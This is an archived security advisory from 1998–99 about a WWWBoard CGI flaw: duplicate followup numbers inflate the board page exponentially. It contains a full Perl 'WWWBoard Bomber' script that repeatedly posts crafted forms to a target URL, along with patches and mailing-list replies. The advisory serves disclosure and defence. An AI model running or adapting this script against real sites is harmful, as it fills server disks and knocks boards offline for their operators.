wwwboard-bomb.txt

1999-08-17T00:00:00
ID PACKETSTORM:15358
Type packetstorm
Reporter Packet Storm
Modified 1999-08-17T00:00:00

Description

WWWBoard v2.0 ALPHA Vulnerability  
  
Recently, many vulnerabilities have been found in the popular WWWBoard script written by Matt
Wright; this is yet another. When the followup value in a form posted to the WWWBoard script
contains the same post number twice, the script follows up to that post twice, and even prints the
number of followups to a particular post (in the wwwboard.html file) multiple times. This does
more than just 'mess up' the board: if done severely enough, it can cause the wwwboard.html file
to grow to hundreds of megabytes in size. The number of followups shown on the main page (if
there are three, it looks like "(3)") appears to increase exponentially with this flaw, such that
posting a followup value of, say, "5,5,5" 2 times would make (2) appear as the followup value, but
it would appear 9 times. From the best I can tell, the number of identical followup numbers you
post (for example "3,3,3,3,3" has 5) is the number of times the followup value will appear on the
wwwboard.html page; if you post the same value twice it is that number squared, three times it is
cubed, and so on (so if you post "3,3,3,3,3" once it will have 5 followup numbers, twice 25, three
times 125, ten times 9,765,625, twelve times 244,140,625, thirteen times 1,220,703,125, etc.). And
although it appears that only three bytes, "(X)", are added for each followup value you see, there
are comments in the HTML as well, so it appears as "(<!--responses: 3-->5)" in the HTML source if
there are 5 followups to message 3.
  
As that shows, this can cause much more damage than a simple annoyance. This flaw could easily be
exploited to the point where a user's quota is maxed out, or even to the point where the web
server runs out of disk space. Below is an exploit script, and a patch to fix the wwwboard.pl
script.
Samuel Sparling  
  
  
Here is an example Perl script to exploit this flaw:

#!/usr/bin/perl
###################################################
#
# WWWBoard Bomber Exploit Script
# Written By: Samuel Sparling (sparling@slip.net)
#
# Written to exploit a flaw in the WWWBoard script
# by Matt Wright.
#
# Copyright © 1998 Samuel Sparling
# All Rights Reserved.
#
# Written 11-04-1998
###################################################
use Socket;   # Tell perl to use the Socket module

# Change this if the server you're trying on uses a different port for http
$port=80;

print "WWWBoard Bomber Exploit Script\n\n";
print "WWWBoard.pl URL: ";
$url=<STDIN>;
chop($url) if $url =~ /\n$/;

print "Name: ";
$name=<STDIN>;
chop($name) if $name =~ /\n$/;

print "E-Mail: ";
$email=<STDIN>;
chop($email) if $email =~ /\n$/;

print "Subject: ";
$subject=<STDIN>;
chop($subject) if $subject =~ /\n$/;

print "Message: ";
$message=<STDIN>;
chop($message) if $message =~ /\n$/;

print "Followup Value: ";
$followup=<STDIN>;
chop($followup) if $followup =~ /\n$/;

print "Times to Post: ";
$stop=<STDIN>;
chop($stop) if $stop =~ /\n$/;


# Chop the URL into pieces to use for the actual posting
# ($remote becomes the host part, $path the request path)
$remote = $url;
$remote =~ s/http\:\/\///g;
$remote =~ s/\/([^>]|\n)*//g;

$path = $url;
$path =~ s/http\:\/\///g;
$path =~ s/$remote//g;


$forminfo = "name=$name&email=$email&followup=$followup&subject=$subject&body=$message";
$forminfo =~ s/\,/\%2C/g;   # Turn commas into %2C so that they can be posted.
$forminfo =~ tr/ /+/;

$length = length($forminfo);

$submit = "POST $path HTTP/1.0\r\nReferer: $url\r\nUser-Agent: Mozilla/4.01 (Win95; I)\r\nContent-type: application/x-www-form-urlencoded\r\nContent-length: $length\r\n\r\n$forminfo\r\n";

$i=0;
while($i < $stop)
{
    &post_message;
    $i++;
    print "$i message(s) posted.\n";
}


sub post_message
{
    if ($port =~ /\D/) { $port = getservbyname($port, 'tcp'); }
    die("No port specified.") unless $port;
    $iaddr = inet_aton($remote) || die("Failed to find host: $remote");
    $paddr = sockaddr_in($port, $iaddr);
    $proto = getprotobyname('tcp');
    socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die("Failed to open socket: $!");
    connect(SOCK, $paddr) || die("Unable to connect: $!");
    send(SOCK,$submit,0);
    while(<SOCK>) {
        #print $_;   # Uncomment for debugging if you have problems.
    }
    close(SOCK);
}


exit;
  
  
  
Below is the patch. All it does is check that the same followup number is not used more than once in the followups form field.

In the get_variables subroutine replace this:

if ($FORM{'followup'}) {
    $followup = "1";
    @followup_num = split(/,/,$FORM{'followup'});
    $num_followups = @followups = @followup_num;
    $last_message = pop(@followups);
    $origdate = "$FORM{'origdate'}";
    $origname = "$FORM{'origname'}";
    $origsubject = "$FORM{'origsubject'}";
}

with this:

if ($FORM{'followup'}) {
    $followup = "1";
    @followup_num = split(/,/,$FORM{'followup'});
    $num_followups = @followups = @followup_num;
    $last_message = pop(@followups);
    $origdate = "$FORM{'origdate'}";
    $origname = "$FORM{'origname'}";
    $origsubject = "$FORM{'origsubject'}";

    # WWWBoard Bomb Patch
    # Written By: Samuel Sparling (sparling@slip.net)
    # Compare every remaining followup number against every other one;
    # any repeated number means the post is a board bomb and is rejected.
    $fn=0;
    while($fn < $num_followups)
    {
        $dfn=0;
        foreach $fm (@followups)
        {
            if($followups[$dfn] == $followups[$fn] && $dfn != $fn)
            {
                &error('board_bomb');
            }
            $dfn++;
        }
        $fn++;
    }
    # End WWWBoard Bomb Patch
}
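The patch above only looks for duplicates. A stricter version of the same check, written here as an added example rather than code from the advisory or from WWWBoard itself, also rejects followup entries that are not plain message numbers and entries that do not refer to an existing message file, which covers the "44,blah" case mentioned in the follow-up post further down. It assumes WWWBoard's `%FORM` hash and `&error` subroutine, and a hypothetical `$mesgdir` variable naming the directory that holds the `NNN.html` message files; the demonstration at the bottom runs against a temporary directory with constructed message files.

```perl
#!/usr/bin/perl
# Added example: strict validation of the WWWBoard "followup" form field.
# Not part of Samuel Sparling's patch or Matt Wright's WWWBoard.
use strict;
use warnings;
use File::Temp qw(tempdir);

# Returns the validated list of followup numbers, or dies with a reason.
# Rules: every entry is a decimal number, no number appears twice, and
# every referenced message file already exists under $mesgdir (assumed name).
sub validate_followups {
    my ($raw, $mesgdir) = @_;
    my @nums = split /,/, $raw, -1;   # -1 keeps empty trailing fields so they fail below
    die "empty followup list\n" unless @nums;
    my %seen;
    for my $n (@nums) {
        die "followup '$n' is not a message number\n" unless $n =~ /^\d+$/;
        die "followup $n listed more than once\n"      if $seen{$n}++;
        die "followup $n refers to a message that does not exist\n"
            unless -f "$mesgdir/$n.html";
    }
    return @nums;
}

# Inside get_variables it would be used like this (assumed names):
#   my @followup_num = eval { validate_followups($FORM{'followup'}, $mesgdir) };
#   &error('board_bomb') if $@;

# Constructed demonstration: a temporary board with messages 3 and 5 only.
my $dir = tempdir(CLEANUP => 1);
for my $n (3, 5) {
    open my $fh, '>', "$dir/$n.html" or die "create $n.html: $!";
    close $fh;
}
for my $input ('3,5', '5,5,5', '44,blah', '3,9') {
    my @ok = eval { validate_followups($input, $dir) };
    print $@ ? "REJECT '$input': $@" : "ACCEPT '$input' -> @ok\n";
}
```

Checking the whole list before `pop` removes `$last_message` means a duplicate involving the message being replied to is caught as well, and the existence check stops a bogus entry from creating a stray file on disk.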
  
  
--------------------------------------------------------------------------------------  
  
Date: Tue, 10 Nov 1998 14:11:39 +0300  
From: Spartak Radchenko <spartak@AIF.RU>  
To: BUGTRAQ@netspace.org  
Subject: Re: WWWBoard Vulnerability  
  
I advise you not to use any of Matt Wright's programs. According to my
experience they are full of various bugs (at least, the program that I
tried to use).

I tried to use his Web counter (TextCounter C++ Version 1.3) and it was
full of absolutely lame errors. His attempts to invent a new way of
file locking were simply ridiculous. After several attempts to correct
these errors I came to the conclusion that its design is invalid beyond repair
and simply rewrote it from scratch.
  
An example from  
http://www.worldwidemart.com/scripts/cgi-bin/c_download.cgi?s=textcounter&c=txt&f=tcounter.cpp:  
  
// Generate the lock filename.  
lock_file = new char[count_page_len + 4];  
strcat(lock_file,data_dir);  
strcat(lock_file,count_page);  
strcat(lock_file,".lck");  
  
No comments...  
  
My email to Matt Wright about these bugs was ignored.  
  
Spartak Radchenko SVR1-RIPE  
Arguments & Facts Weekly  
  
On Mon, 9 Nov 1998, Samuel Sparling wrote:  
  
> Recently, many vulnerabilities have been found in the popular "WWWBoard  
> v2.0 ALPHA" script written by Matt Wright, this is yet another. When the  
  
  
--------------------------------------------------------------------------------------  
  
Date: Tue, 10 Nov 1998 22:56:08 -0800  
From: Samuel Sparling <sparling@SLIP.NET>  
To: BUGTRAQ@netspace.org  
Subject: Re: WWWBoard Vulnerability  
  
I'd like to mention that the patch I gave a few days ago (in the "WWWBoard
Vulnerability" posting) also protects against other bogus followup errors
(whereas, w/o the patch, somebody using the exploit script, or just a form,
could post w/ a followup value of, for instance, "44,blah", and the script
would create a file called blah.html). Although the file created when doing
that is empty, it will not show up in the "WWWAdmin" script; other than
that, there isn't any problem I've yet found with that.
Samuel Sparling  